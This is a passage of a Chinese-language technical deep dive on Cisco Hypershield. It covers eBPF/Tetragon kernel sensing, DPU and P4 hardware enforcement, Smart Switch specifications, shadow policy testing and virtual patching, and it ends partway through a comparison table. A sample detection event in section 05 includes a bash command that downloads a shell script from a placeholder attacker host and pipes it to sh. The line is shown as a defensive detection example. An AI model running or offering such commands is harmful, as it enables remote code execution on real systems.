TECHNICAL DEEP DIVE · 2026

织就安全之茧
Cisco Hypershield 深度解析

从 eBPF 内核感知到 P4 硬件加速,从 DPU 物理隔离到 AI 自主决策——
构建超大规模云原生时代的分布式主动防御基座

400G 原生线速加解密
Line-rate Crypto
< 8μs 端到端安全附加延迟
Security Overhead
0-Day 自主漏洞热补丁
Exploit Protection
64M 有状态会话表
Stateful Sessions
01

愿景与挑战:为什么需要 Hypershield?

Vision & Challenge: Why Hypershield?

传统网络安全像是在城堡外墙不断加固城门——边界防火墙(Perimeter Firewall)。然而当攻击者已经混入城中,城门再厚也无济于事。在现代云原生与 AI 规模的数据中心里,70% 的攻击使用横向移动(Lateral Movement),威胁不再从"门口"进来,而是从内部蔓延。

瓶颈一:软件定义的性能天花板

纯软件防火墙在处理 100G/400G 东西向流量时,会消耗宿主机 30%+ 的 CPU 资源。每多一个安全功能(状态检测、TLS 解密、DPI),CPU 开销就像"业务税"一样层层累加。对于 AI 训练集群的 RDMA (RoCEv2) 零拷贝通信,任何 CPU 介入都意味着不可接受的尾延迟Tail Latency:指在延迟分布中处于最高百分位(如 P99/P99.9)的延迟值。AI 训练中,一个慢节点会拖慢整个集群。增长。

🔍

瓶颈二:东西向流量的分段死角

现代数据中心的流量模型已从"南北向"为主转变为"东西向"为主——容器与容器、VM 与 VM、微服务之间的通信庞大且隐蔽。集中式网关(如传统防火墙集群)面对数十万条微分段规则时,不仅TCAM 容量不足,还因流量发卡弯Hairpinning:流量被迫绕行到远端防火墙再折返回来的路径,增加延迟和带宽浪费。(Hairpinning)导致延迟剧增和丢包

🕐

瓶颈三:零日漏洞的真空期

每天新披露超过 130+ 个漏洞,其中 30% 在 24 小时内被武器化。而企业平均补丁周期长达 60 天。这意味着从漏洞被发现到补丁生效之间,存在一个漫长而危险的"攻击者优势窗口"(Patching Gap)——攻击者从容利用,防御者手忙脚乱。

用"黄金圈"法则理解 Hypershield

Simon Sinek 的黄金圈模型告诉我们:伟大的产品从"为什么"出发,而非"是什么"。让我们用 Why → How → What 的顺序,从根本驱动力开始理解 Cisco Hypershield。

WHY · 核心驱动

消除"安全 vs 性能"的博弈

让安全像空气一样无处不在,却不消耗业务算力。当今数据中心每增加一道安全屏障,就要付出延迟和 CPU 的代价。Hypershield 的存在,就是要彻底终结这种"鱼与熊掌不可兼得"的困局

HOW · 技术路径

DPU 卸载 + eBPF 深度观测

通过专用数据处理器 DPU(AMD Pensando)将安全计算从主机 CPU 完全卸载,同时利用 eBPF/Tetragon 在 Linux 内核层实现进程级实时观测——不仅看 IP/端口,更识别"谁的哪个进程在做什么"

WHAT · 产品愿景

自防御、自更新、自验证的安全织物

一种分布式的安全茧(Security Cocoon),编织在交换机端口、服务器网卡和容器内核的每一处连接点。它能自动发现攻击、自主生成阻断规则、通过双胞胎测试验证策略后再上线——全程无需人工介入

第一性原理拆解

安全功能本质上是计算任务——状态检测、加解密、模式匹配、策略查询。如果我们追问"这些计算必须由业务服务器的 CPU 完成吗?",答案显然是。将安全计算卸载到专用硬件(DPU),就像将图形渲染卸载到 GPU 一样,是计算架构演进的必然。这正是 Hypershield 的第一性原理基础。

02

核心组件深度定义:建立共同基础

Technical Foundation: Common Ground

Patrick Henry Winston 在 MIT 《Make It Clear》中强调:沟通的第一步是建立共同基础(Common Ground)。在深入架构之前,让我们确保对三个核心支柱的理解在同一频率上。

关键技术 技术原理 (Mechanism) 架构价值 (Architectural Value)
DPU / SmartNIC
Data Processing Unit
专为数据中心设计的第三类处理器(继 CPU、GPU 之后)。以 AMD Pensando 为例:集成 16 个 ARM 核心用于控制面管理,以及 144 条 P4 可编程流水线用于数据面高速处理。它拥有独立的 CPU、内存和操作系统,与宿主机完全隔离。 物理隔离:安全逻辑运行在 DPU 独立内存空间中。即使宿主机操作系统被完全攻破(Root Shell),攻击者也无法触及或关闭 DPU 中运行的安全引擎——因为它们在物理层面就是两套独立的计算系统
P4 Runtime
可编程数据面
P4 (Programming Protocol-Independent Packet Processors) 是一种面向网络硬件的领域专用语言。它基于"匹配-动作"(Match-Action)流水线模型,允许开发者直接定义硬件如何解析协议头如何匹配规则如何处置报文——全部在 ASIC 线速下完成。 毫秒级动态执行:将安全规则直接编译为 ASIC 硬件逻辑。不需要软件查找表(lookup table),不需要 CPU 中断——非法报文在进入任何软件栈之前,就被硬件流水线线速丢弃。这意味着添加安全规则几乎不增加延迟
eBPF + Tetragon
内核级观测
eBPF(Extended Berkeley Packet Filter)是 Linux 内核中的一个受限沙箱执行环境。它允许在不修改内核源代码不加载传统内核模块的前提下,安全地向内核注入定制逻辑——通过 Hook 系统调用、网络事件、文件操作等关键路径

Tetragon(基于 Isovalent,现隶属 Cisco)是构建在 eBPF 之上的高级安全运行时引擎。它提供同步式(Synchronous)内核级监控与执行,而非传统安全工具的"事后审计"模式。
深度上下文感知:传统防火墙只能看到五元组(源/目IP、源/目端口、协议)。而 Tetragon 能识别"哪个用户哪个进程正在执行哪个系统调用,访问了哪个文件"。这种粒度的可见性,是实现精准防护与减少误报的基础。

关键差异:eBPF 的验证器(Verifier)在加载前检查内存安全和程序终止性,JIT 编译器将其编译为本机指令——因此它既安全又高效,对系统性能的影响不到 2%
专家洞察:P4 与 eBPF 的"上下联动"

P4 与 eBPF 的结合实现了真正的感官与肌肉的协同。eBPF/Tetragon 在主机端提供丰富的"为什么阻断"上下文(进程身份、行为异常、文件访问),而 P4 在网络交换端提供"如何阻断"的极致硬件性能(线速丢包、无查找延迟)。上下文驱动决策,硬件执行决策——这是传统单点防火墙永远无法实现的架构优势

Hypershield 的三大自治支柱

The Three Pillars of Autonomous Security

🧩

自主分段

Autonomous Segmentation

利用 AI 分析实时流量行为模式,自动创建和持续优化微分段规则。它能识别 GPU 训练作业的流量特征并动态闭合未使用端口,消除传统防火墙中数万条手工 ACL 的维护噩梦。Smart Switch DPU 支持多达 200 万条细粒度动态安全规则(首发版本 10 万条),远超传统 TCAM 的容量限制。

🛡️

分布式漏洞防护

Distributed Exploit Protection (DEP)

在厂商补丁发布之前,系统自动在 DPU 层面生成并部署补偿性控制措施(Compensating Controls)。例如面对 CVE-2024-21626(runc 容器逃逸),DEP 能在数小时内阻断利用该漏洞的特定行为模式——而无需等待上游发布修复版本。这将平均修复时间从数周压缩到数小时

🔄

自愈式策略更新

Self-qualifying Policy

安全运维中最大的恐惧:"改了规则会不会断业务?"。Hypershield 通过双胞胎测试(Shadow Testing / Digital Twin)在 DPU 的隔离分片中运行新策略。新策略处理真实流量的镜像副本,但不实际阻断——仅报告"如果上线,哪些流量会被丢弃"。当 AI 确认零误杀后,才会推送到生产环境

eBPF 的安全保障机制

eBPF 并非"随意向内核注入代码"。每个 eBPF 程序在加载前必须通过验证器(Verifier)的严格检查:确保内存安全、程序必定终止(无死循环)、只能访问预批准的内核函数和数据结构。通过验证后,JIT 编译器将其编译为本机指令,并经过加固处理(Spectre 缓解、常量盲化等)。这种"先审后行"机制,使 eBPF 成为内核扩展的安全标杆。

03

硬件基座:Cisco Nexus 9300 Smart Switch

Hardware Foundation: The Intelligent Control Node

普通交换机只是数据高速公路的被动收费站——报文进来,查找路由表,转发出去。而 Cisco Nexus 9300 Series Smart Switch 是集成了 DPU 的智能哨所与执法站——它不仅路由报文,还同时进行深度安全检测与策略执行。它在传统交换架构之上,增加了革命性的"第三条路径"(Third Path)

N9324C-SE1U

24-port 100G · 800G DPU Security Services
前面板端口 24 × 100G QSFP28 (2.4T)
NPU 芯片 Silicon One E100
DPU 型号 / 数量 4 × AMD Pensando "Elba"
DPU 互联带宽 每 DPU 200Gbps (总计 800G)
DPU 内存 32GB DRAM × 4 = 128GB
P4 流水线 144 可编程引擎 / DPU
ARM 核心 16 核 / DPU
系统 CPU 16 核 2.5GHz Intel + 96GB DRAM
转发性能 2.1 Bpps
交换延迟 ~2.5μs (NPU)
MACsec 所有端口线速
典型功耗 794W(含光模块 50% 负载)
Breakout 4×25G Breakout 4×10G 10G QSA ✓ Port-side Exhaust

N9348Y2C6D-SE1U

48-port 25G + 6-port 400G + 2-port 100G · 800G Services
前面板端口 48×25G SFP28 + 2×100G + 6×400G (3.8T)
NPU 芯片 Silicon One E100
DPU 型号 / 数量 2 × AMD Pensando "Giglio"
DPU 互联带宽 每 DPU 400Gbps (总计 800G)
DPU 内存 64GB DRAM × 2 = 128GB
P4 流水线 144 可编程引擎 / DPU
ARM 核心 16 核 / DPU
系统 CPU 16 核 2.5GHz Intel + 96GB DRAM
转发性能 2.1 Bpps
交换延迟 ~2.5μs (NPU)
MACsec 所有端口线速
典型功耗 829W(50% 负载)/ 1039W max
400G QSFP-DD Breakout 4×100G 1G 支持 (10.6.3F) Port-side Intake

Smart Switch 的"第三条路径"架构

Cisco Silicon One E100 Network Processing Unit (NPU) L2/L3 路由 VXLAN/BGP QoS/ECN Multicast ACL / MACsec / Netflow 传统网络功能 (Path 1 & 2) ⚡ 延迟 ~2.5μs · 2.1 Bpps MIRROR AMD Pensando DPU 集群 Data Processing Unit · P4 可编程 状态防火墙 Stateful FW IPsec/TLS 线速加解密 NAT/PAT 负载均衡 Telemetry 流数据采集 🔒 DPU 延迟 ~3μs · 64M 会话 · 物理隔离 PASS/DROP Hypershield On-Prem Controller AI 推演引擎 策略验证/分发 Shadow Testing gRPC ■ Path 1&2: 传统交换/路由 ■ Path 3: DPU 并行安全处理 ■ Control: Hypershield 策略管理

图示:Smart Switch 的"第三条路径"——流量在 NPU 正常转发的同时,被镜像至内置 DPU 进行并行安全处理,不影响主转发路径延迟

Smart Switch 的三大硬件能力突破

流量在经过 Silicon One E100 NPU 交换芯片的同时,被镜像(Mirror)到内置 DPU。DPU 在其独立的 P4 流水线和 ARM 核心中完成有状态防火墙(Stateful FW)、负载均衡(LB)和深度加密检测(Encryption Inspection)——整个过程与主转发路径完全并行,不增加交换延迟

DPU 报文处理流程:报文首先进入 P4 流水线。如果在流表(Flow Table)中找到匹配项,则直接在 P4 硬件中转发(快路径)。如果是新流(Flow Miss),则报文被 punt 到 VPP(Vector Packet Processing)层建立流表项。TCP 握手/挥手包(SYN, SYN-ACK, ACK, FIN)始终经过 VPP 处理,且在 HA 场景下同步到对端

端到端延迟:NPU (~2.5μs) + DPU (~3μs) + NPU (~2.5μs) ≈ 8μs。作为对比,传统外置防火墙的延迟通常在 50μs ~ 数百μs 级别

传统交换机的 ACL 数量受到TCAMTernary Content-Addressable Memory:三态内容可寻址存储器。交换机中用于高速匹配 ACL/路由的专用硬件,价格昂贵、容量有限(通常数千到数万条规则)。硬件容量限制(通常为 5,000~8,000 条)

Nexus 9300 Smart Switch 利用 DPU 的大容量 DRAM(每 DPU 32/64GB)和 P4 灵活性,可以支持最高 200 万条细粒度动态安全规则(首发版本验证至 10 万条),以及 6400 万有状态会话。这是传统 TCAM 容量的200 倍以上

对比数据:ACI/EVPN GPO 的过滤规则容量为 60k~100k(无状态),而 Smart Switch DPU 提供 100k~2M(有状态)

DPU 内置硬件加密加速器,在 400G 线速下完成 MACsec(所有端口)和 IPsec/TLS 加解密,实现网络透明的全流量加密

这是实现"零信任物理层"的关键:任何跨机架、跨集群传输的数据——包括 AI 训练的权重参数和梯度数据——都在硬件层级被自动加密,无需消耗服务器 CPU 或 GPU 资源

Smart Switch vs. 传统防火墙:关键维度对比

维度 Nexus 9300 Smart Switch 传统外置防火墙
策略协调 Hypershield 统一分布式管理
AI 驱动
中央控制台,L7 功能集中
性价比 更高性能,更低成本 性能有限,硬件昂贵
延迟 ~2.5μs(NPU) + 3μs(DPU) + 2.5μs(NPU) ≈ 8μs 通常 50μs ~ 数百μs
有状态检测 TCP 状态跟踪 + 序列号检查 + 反射 ACL
64M 会话表
TCP 状态跟踪(会话表通常较小)
MACsec 所有交换端口线速 不适用 (N/A)
深度包检测 L4 有状态 + 少量协议(首发)
路线图:L7 集成
更全面的 L7 DPI 功能
过滤规则容量 100K~2M 动态规则 受 TCAM 限制(数千条)
部署位置 每个 ToR 端口即为执行点
无需 Hairpinning
集中式,需要流量重定向
Hairpinning 增加延迟
设计哲学:网络设备 AND 安全设备

Nexus 9300 Smart Switch 的核心设计原则是"一台设备,两种人格"——NPU 部分由 NetOps 通过 NX-OS CLI / Nexus Dashboard 管理传统网络功能;DPU 部分由 NetSecOps 通过 Hypershield On-Prem Controller 管理安全策略。两者共享同一个 NX-OS 软件镜像,但职责分离、工作流独立,通过上下文共享实现联合排障

04

协同进化:Hypershield 与 Tetragon 的共生关系

Symbiosis: The Digital Immune System

Patrick Henry Winston 曾说:"类比是通向理解的桥梁"。要真正理解 Hypershield 各组件如何协同,最直观的方式是将其映射为一个高度进化的生物防御系统——你的身体如何抵御病原体入侵,Hypershield 就如何保护数据中心。

🧬 数字免疫系统架构映射 🔬 白细胞 White Blood Cells Tetragon / eBPF 内核级感知代理 📍 部署位置 Linux 内核 · 每个 VM/容器/裸机 👁️ 感知能力 进程行为 · 系统调用 · 文件访问 网络连接 · 用户身份 · 进程树 ⚡ 响应模式 同步式(Synchronous)内联执行 非事后审计,实时阻断恶意行为 🎯 类比 如同白细胞穿梭血管,检测每个 "细胞"(进程) DNA 是否发生变异 🧠 中枢神经 Central Nervous System Hypershield AI 引擎 On-Prem Controller + SCC 📍 运行环境 DPU 独立隔离环境 / 3 VM 集群 与宿主 CPU 完全物理隔离 🧮 决策能力 聚合感知信号 → 威胁推理 策略验证 (Shadow Testing) 全局同步防御姿态 🎯 类比 如同中枢神经接收感觉信号, 毫秒内推演是否为攻击, 并向全身协调防御响应 🛡️ 抗体与皮肤 Antibodies & Skin Smart Switch DPU P4 硬件执行层 📍 执行位置 每个 ToR 交换机端口 · 每台服务器的 DPU 网卡 💪 执行能力 P4 线速阻断/隔离/重定向 MACsec/IPsec 硬件加解密 微秒级有状态策略执行 🎯 类比 如同皮肤与抗体构成物理屏障, 在病毒(恶意报文)接触核心业务前 就将其在网络接口层级灭活 信号 指令 反馈闭环 · Feedback Loop

图示:数字免疫系统三层架构——感知(白细胞/eBPF)→ 决策(中枢神经/AI)→ 执行(抗体/DPU)→ 反馈闭环

感知层:Tetragon 的"凝视"

Tetragon 不是被动的日志收集器,而是一个同步式内核观察者。当它检测到异常(如 Web 进程 fork 了 bash),可以在同一系统调用返回之前就阻断执行——不需要等报文出站,不需要用户态工具介入。这就是"在病毒复制第一个 DNA 片段时就截断它"

进程行为 系统调用 文件 I/O 网络事件

决策层:Hypershield 的"推演"

Hypershield AI 引擎聚合来自数千个节点的 Tetragon 信号,结合全局威胁情报漏洞管理数据(可集成 Wiz、Qualys、Tenable 等),进行智能推理。关键特性:它运行在与宿主机完全物理隔离的 DPU 环境中——即使攻击者已获得 Root Shell,也无法触及这个"隔离大脑"

全局推理 策略验证 Shadow Test 跨云同步

执行层:DPU 的"灭活"

当决策层发出阻断指令,Smart Switch 的 DPU 通过 P4 流水线微秒级完成执行。没有软件栈延迟,没有 CPU 中断。报文在到达目标服务器之前就已被硬件丢弃——就像皮肤在病原体进入血液之前就将其挡在体外。同时,DPU 支持对称哈希负载均衡和VRF/VLAN 级别的策略绑定,确保大规模流量的高效分发

线速阻断 P4 Match-Action 硬件加密 64M 会话
为什么"生物隐喻"如此重要?

这不仅仅是修辞。生物免疫系统的核心特征——分布式(白细胞遍布全身,而非集中在一个器官)、自适应(遇到新病原体后自动产生抗体)、层次化(皮肤→先天免疫→适应性免疫)——与 Hypershield 的架构设计一一对应。传统防火墙更像是一个"安检门",而 Hypershield 是一个完整的"免疫系统"。这种分布式、自适应的设计哲学,才是应对 AI 时代新型威胁的根本出路

05

分层闭环:感知、推演与双胞胎测试

Closed-Loop Workflow: Sensing, Reasoning & Shadow Testing

安全运维中最深的恐惧不是"攻击来了怎么办",而是"改了安全规则,业务断了怎么办"。Hypershield 通过革命性的四步闭环工作流彻底解决这个痛点——从内核感知到硬件阻断,每一步都经过严格验证。

1

感知 实时内核观测(Kernel Observability)

Tetragon 的 eBPF 程序 Hook 在 Linux 内核的关键路径上:execve(进程创建)、connect/sendmsg(网络连接)、open/read(文件操作)等系统调用。它捕获的不是简单的网络五元组,而是完整的行为指纹

示例场景:Apache 进程(PID 3847, UID www-data)突然执行了 fork() → execve("/bin/bash"),并通过 bash 发起了到外部 IP 的 LDAP 出站连接。这是一个经典的 RCE(远程代码执行)攻击信号——正常的 Web 服务器进程绝不会 fork bash

tetragon-event.json · Kernel Event Capture
// Tetragon 捕获的内核事件 — Apache 进程异常行为 { "process_exec": { "process": { "binary": "/usr/sbin/apache2", "pid": 3847, "uid": 33, // www-data "cwd": "/var/www/html", "arguments": "-k start" }, "parent": { "binary": "/usr/sbin/apache2", "pid": 1024 } }, ⚠ "process_fork": { "child_binary": "/bin/bash", // ← 异常!Web 进程 fork bash "child_pid": 3848, "child_args": "-c 'curl http://evil.cc/shell.sh | sh'" }, "network_connect": { "dest_ip": "198.51.100.77", "dest_port": 389, // LDAP — Log4Shell 攻击特征 "protocol": "TCP" } }
2

验证 双胞胎测试(Shadow Execution / Digital Twin)

Hypershield 不会立即将新策略推送到生产环境。取而代之的是,它在 DPU 的独立隔离分片中创建一个"数字孪生"(Digital Twin)——新策略处理的是真实流量的镜像副本,但不进行任何实际阻断

Shadow 环境会持续对比两个版本的策略(v1 当前策略 vs v2 新策略),生成详细的差异报告:"如果 v2 上线,这 N 条流量会被新增允许,M 条流量会被新增阻断"。运维人员可以看到精确的影响范围,而不是盲目猜测。

$ netpol diff production staging · 策略差异对比
$ netpol diff production staging Verdict differences ------------------- 0.0.0.0/0:* -> 10.2.0.0/16:80 Rule Proto Src SrcPort Dst DstPort Action example/allow TCP 10.1.0.0/16 * 10.2.0.0/16 80 allow + example/deny TCP 0.0.0.0/0 * 10.2.0.1/32 * deny ← NEW + example/allow TCP 10.1.0.0/16 * 10.2.0.0/24 80 allow ← NEW Shadow Test Result: Flows affected: 23 flows would be NEWLY DENIED False positives: 0 legitimate flows impacted Confidence level: 98.7%
历史流量回放验证

除了实时 Shadow 测试,Hypershield 还支持历史流量回放验证:将新策略与过去最多 1 年的流量数据进行比对,发现季节性流量模式或历史可疑攻击。命令示例:netpol check --timescape=server:4244 production staging

3

推演 AI 推理与确信度评估(Reasoning & Confidence)

Hypershield AI 引擎分析双胞胎测试结果。核心判断标准:新策略是否会误杀正常业务流量(False Positives)。如果在统计窗口内,新策略对所有合法流量的处置与旧策略完全一致(或更优),且阻断的全部是已确认的恶意/可疑流量,AI 引擎给出高确信度评分(例如 98.7%)并建议自动部署到生产环境

在确信度未达到阈值时,系统会向 NetSecOps 人员发送详细的决策报告——包含受影响流量列表、潜在风险和建议调整方案——由人工审批后再推送。这确保了AI 增强决策、人类把控风险的平衡。

4

执行 分布式硬件强制执行(Distributed Enforcement)

策略通过 gRPC 从 Hypershield Controller 推送到所有注册的 Smart Switch DPU Agent。DPU Agent 将策略转换为 P4 Match-Action 规则,下发到 DPU 硬件流水线。在全网范围内:

  • ✓ 所有 N9300 Smart Switch 的 DPU 同时更新策略——瞬间封死受攻击的漏洞路径
  • ✓ 服务器端的 Hypershield Agent(eBPF)同步阻断恶意进程行为
  • ✓ 整个执行过程无需修改业务应用、重启服务或安排维护窗口
nxos-config · VRF Redirect to DPU
! ——— 启用 DPU 服务加速 ——— feature service-acceleration service load-balance symmetric-hash ! ! ——— 注册 Hypershield 控制器 ——— service system hypershield source-interface loopback100 service firewall vrf red ! 将 VRF red 的路由流量重定向到 DPU vrf green ! 将 VRF green 的路由流量重定向到 DPU in-service service system hypershield register 34C58A342F… ! 控制器连接令牌
闭环时序:从内核感知到硬件阻断

整个闭环的时序可以总结为:Tetragon 感知异常(内核微秒级)→ Hypershield 生成/验证策略(Shadow 测试数分钟)→ DPU 全网执行(P4 下发秒级)。从发现攻击到全网封堵,可以压缩到数分钟——而传统模式下,仅等待厂商补丁就需要平均 21 天

06

全景视角:为什么这种架构近乎无懈可击

Panorama: A Unified Security Fabric & Defense in Depth

Hypershield 不仅仅运行在 N9300 Smart Switch 上。它是一个分布在网络节点、计算节点和云端的统一安全层——三类执行点共同编织出一张没有缝隙的安全织物。

部署点 角色与职责 适用场景
N9300 Smart Switch
网络层
物理入口屏障:在 ToR 交换机端口级别拦截未授权的东西向流量。特别适合保护不具备安装 DPU/Agent 条件的遗留服务器(Legacy)——无需在工作负载上安装任何软件即可获得 L4 有状态分段保护 ToR 微分段 · 遗留服务器保护 · ACI 集成 · Zone-based FW · AI Fabric GPU 分段
Server DPU / 工作负载 Agent
工作负载层
深度工作负载保护:在应用入口处进行零信任强制执行。包括 eBPF Workload Agent(Linux/Windows)、Kubernetes DaemonSet、以及 Secure Workload Agent。Agent 提供 L4 网络分段、L7 应用级策略和进程级运行时安全。 容器微分段 · 进程级零信任 · VDI 隔离 · 运行时漏洞防护
Hypershield Controller
控制面
指挥中心:AI 驱动的统一策略管理。On-Prem Controller(3 VM Kubernetes 集群)负责本地控制;可选的 Security Cloud Control (SaaS) 提供跨多个数据中心和公有云的全局策略一致性。 跨站点统一策略 · 多云安全编排 · 与 Splunk/Grafana 集成可视化

四重不可突破的防线

① 零信任的终极形态:分布式织物

安全不再依赖单一外置设备或单一"安检门"。执行点遍布每一个 ToR 端口、每一台服务器网卡、每一个容器内核——形成如同皮肤一样覆盖全身的分布式 Fabric。攻击者无论从哪个点突破,都会立即遇到下一层防护

② 性能零损耗:硬件原生执行

所有加解密(MACsec/IPsec)、状态检测、L4 策略执行全部在 DPU P4 硬件中完成。宿主机 CPU 可以100% 专注于业务计算。TCO 角度看,释放的 30% 服务器算力通常可以抵消硬件升级本身的成本

③ 攻击面最小化:物理隔离

Hypershield 的安全引擎运行在 DPU 的独立内存和计算环境中,与宿主机操作系统物理隔离。即使攻击者获得了 Root 权限、甚至完全控制了 OS,也无法触及或关闭底层的 DPU 防护逻辑——安全系统以 Out-of-band 方式独立运行

④ AI-Native 自适应进化

面对 AI 驱动的新型威胁,防御必须同样具备 AI 的进化速度。Hypershield 内置的 AI 引擎持续学习流量模式、自动推荐和优化分段策略、智能评估漏洞优先级并部署补偿性控制——从发现到修复的时间从数周压缩到数小时

07

实战场景:当 Log4j 再次发生时

Combat Scenario: Facing a Log4j-style 0-Day Crisis

架构的精妙最终要接受烈火的检验。让我们模拟一个 Log4Shell (CVE-2021-44228) 级别的 0-Day 漏洞突袭,看看传统方式和 Hypershield 方式的差异。

😰 传统方式(The Hard Way)

  • 安全团队手动搜索数万个容器和 VM 的 Java 版本与 Log4j 依赖状态
  • 等待 Apache 基金会发布补丁(数天),再等内部 QA 验证(数周)
  • 紧急更新 WAF/IPS 规则——但规则写得太宽会误杀正常 LDAP 业务
  • 全量补丁部署需要维护窗口,业务中断风险高
  • 补丁周期内,攻击者已经通过 JNDI 注入获得反弹 Shell,开始横向移动
  • 平均修复时间:21 天以上,期间暴露面持续扩大

🛡️ Hypershield 方式(The Smart Way)

  • 检测(秒级):Tetragon 在内核发现 Java 进程尝试出站连接到非预期的 LDAP 地址(port 389),且发起进程为 java -jar webapp.jar ——行为指纹匹配 JNDI 注入特征
  • 自治(分钟级):Hypershield AI 自动生成针对性 P4 过滤规则:阻断所有来自 Java 进程的非白名单 LDAP 出站连接
  • 验证(分钟级):新规则在 Shadow 环境中测试——确认不影响正常 LDAP 认证流量
  • 阻断(秒级):DPU 在网络入口硬件层阻断反弹 Shell 流量,业务逻辑无需任何改动
  • 同时 DEP(Distributed Exploit Protection)在所有受影响节点部署运行时屏蔽规则
  • 从发现到全网封堵:数分钟。零业务中断。
真实案例:CVE-2024-21626 — RunC 容器逃逸 (Leaky Vessels)

2024 年初披露的 RunC 1.1.11 漏洞允许攻击者利用容器的工作目录设置(cwd = "/" 指向宿主机命名空间)实现容器逃逸。Hypershield 的 Distributed Exploit Shield 能自动检测并阻断新容器进程以宿主命名空间 "/" 为当前目录的行为——精准阻断攻击路径,而不影响正常容器运行。这种"保护现在,补丁稍后"(Protect Now, Patch Later)的理念,是 Hypershield 漏洞管理的核心哲学。

延伸:Live Protect — NX-OS 交换机自身的漏洞热修复

Live Protect: Virtual Patching for Cisco Nexus Switches

🔧 什么是 Live Protect?

Live Protect 是 Cisco 嵌入 NX-OS 10.6(1)F+ 的eBPF 驱动虚拟补丁方案——业界首创(Arista、Juniper、Aruba 均无等效方案)。它在不升级 NX-OS 软件、不重启交换机的前提下,通过 Tetragon Agent 在 NX-OS 内核中部署补偿性控制策略(Compensating Controls),直接阻断针对已知 CVE 的攻击利用。

工作流程

  • 1. Cisco 在 cisco.com 发布签名策略包(.pkg
  • 2. 通过 Nexus Dashboard / NX-API / CLI 下载并安装到交换机
  • 3. 策略默认为 Monitor 模式(仅观测,不阻断)
  • 4. 验证后切换为 Enforce 模式(主动阻断攻击利用)
  • 5. 待下次正常维护窗口升级 PSIRT 补丁时,SMU 自动移除

🛡️ Live Protect 能防御什么?

CVE-2024-20446(NX-OS DHCPv6 DoS):攻击者发送特制的 RELAY-REPLY 报文使 dhcp_snoop 进程崩溃。Live Protect Hook 到网络 Socket 写调用,在报文到达 NX-OS 进程前丢弃畸形 RELAY-REPLY

CVE-2024-20413(NX-OS Bash 提权):利用应用参数检查不足从 Bash 提升至 network-admin。Live Protect 通过禁用 vsh 进程的 CAP_SYS_ADMINCAP_SYS_CHROOTCAP_SETUID 能力,并防止出厂二进制被覆写

nxos# · Live Protect CLI 操作
! 添加策略包 Switch# nxsecure policy add nxos64.lp000003-1.0.1.pkg ! 查看策略状态 Switch# show nxsecure policy status ! 将策略从 Monitor 提升为 Enforce Switch# nxsecure policy-id lp000003 enforce ! 临时禁用某策略(不移除包) Switch# nxsecure policy-id lp000004 disable ! 导出 Tetragon 事件到 SIEM Switch(config)# nxsecure Switch(config-nxsecure)# export-logfiles http://10.30.220.152:8100
Live Protect 支持平台

已支持(NX-OS 10.6.2+):N9300 系列固定交换机(≥24GB RAM)、N9200 系列、N9300 Smart Switch(网络模式)、N9400 系列。N9100 系列计划在 10.6(3) 支持
不支持:已 EoS 的 N9000、N3000/N3500 系列、N9500/N9800 模块化交换机、RAM < 24GB 的 N9300。
许可:Essentials 及以上 DCN License 即可使用——无需额外安全许可费用。

08

赋能 AI:加速与安全并重

Empowering AI: Security at the Speed of GPU

AI 训练集群依赖 RDMA (RoCEv2) 实现 GPU 间的零拷贝通信——任何 CPU 介入、任何软件过滤都会带来难以承受的尾延迟Tail Latency(P99/P99.9 延迟):AI 分布式训练中,一个慢节点会拖慢整个训练批次。传统 CPU 软件过滤在 RDMA 路径上引入的延迟可能导致训练效率下降 15-30%。增长。这给安全带来了独特挑战:如何在不碰 GPU 算力的前提下保护 AI 工作负载?

Performance

RoCEv2 硬件卸载

N9300 Smart Switch 利用 AMD Pensando Elba/Giglio 架构,在硬件层直接解析 RDMA 报文头,实现微秒级延迟下的安全检测。DPU 的 P4 流水线可以自定义解析 RoCEv2 扩展头部,无需将报文 punt 到 ARM 核心——因此安全检测与 RDMA 零拷贝路径完全并行,不增加任何 hop 延迟。

2025 路线图 (Salina 架构):下一代引擎专门优化 AI 工作负载下的亚微秒级跳数延迟,支持超大规模并行处理

🔒 Security

GPU 东西向分段

AI 训练集群的后端网络(Backend Network)通常承载着模型权重、梯度参数等高价值数据。自主分段(Autonomous Segmentation)能自动识别 GPU 训练作业的流量模式——例如 AllReduce 的通信拓扑——并动态闭合训练作业未使用的端口和路径

实战意义:即使攻击者突破了前端网络(Frontend Network),后端 GPU 互联网络的分段策略也能阻止其接触训练数据——这是保护 AI 模型知识产权的关键防线。

📐 Scale

400G 硬件加解密

Smart Switch 内置硬件加密加速器,支持 400G 线速的 MACsec/IPsec。AI 训练数据的跨机架传输——无论是参数服务器模式还是 Ring-AllReduce 模式——都在硬件层级被透明加密

关键优势:加密完全由 DPU 处理,不消耗服务器的 GPU 或 CPU 资源。对比传统方案(软件 IPsec),后者会消耗 10-15% 的 CPU 核心并增加数十毫秒延迟——在 AI 训练场景下这是不可接受的。

AI Fabric 安全架构:前后端分离

Cisco 推荐的 AI Fabric 设计中,Smart Switch 部署在前端网络(管理/调度/存储流量)和后端网络(GPU-to-GPU RDMA 流量)的交汇处。前端 Smart Switch 提供 L4 有状态分段和 Secure Firewall 集群集成;后端 Smart Switch 专注于 RoCEv2 ECN 标记、WRED、PFC 等 AI 优化功能,同时保持安全可见性。Security Cloud Control 提供跨前后端的统一策略和身份管理

09

架构演进:传统防火墙 vs. Hypershield 全面对比

Evolution: Legacy Perimeter vs. AI-Native Distributed Security

以下对比不仅涉及技术维度,还涵盖 TCO(总拥有成本)、运维复杂度和安全响应速度——帮助决策者全面评估架构迁移的价值。

维度 传统边界防御 (Legacy) Cisco Hypershield (AI-Native)
部署粒度
Granularity
粗粒度 · 基于 IP/VLAN 的中心化网关
TCAM 限制通常 5K-8K 规则
超细粒度 · 基于进程/用户/容器标识的分布式织物
DPU 支持 100K-2M 动态规则 + 64M 会话
性能开销
Performance
高损耗 (CPU Tax) · 占用主机 30%+ CPU 或增加 50ms+ 延迟
AI 训练场景下不可接受
零开销 (Offloaded) · 硬件线速转发,主机 CPU 零消耗
端到端安全附加延迟 ~8μs
策略变更
Policy Change
手动 / 高风险 · 维护数万条 ACL,变更需窗口期
怕改错断网,策略漂移严重
自主 / 自验证 · AI 自动生成策略
Shadow Testing 验证 → 零误杀后自动部署
漏洞防御
Vulnerability
被动补丁 · 等待厂商补丁平均 21 天
窗口期风险巨大,攻击者从容利用
主动热修复 · 数小时内完成 DEP
Protect Now, Patch Later
东西向可见性
E-W Visibility
盲区严重 · 只能看到经过防火墙的流量
同子网/同 VLAN 流量完全不可见
全量观测 · eBPF 进程级 + DPU 流级
ADM 应用依赖映射 + Timescape 回溯
扩展方式
Scalability
垂直扩展 · 买更大的防火墙
800G 防火墙极其昂贵
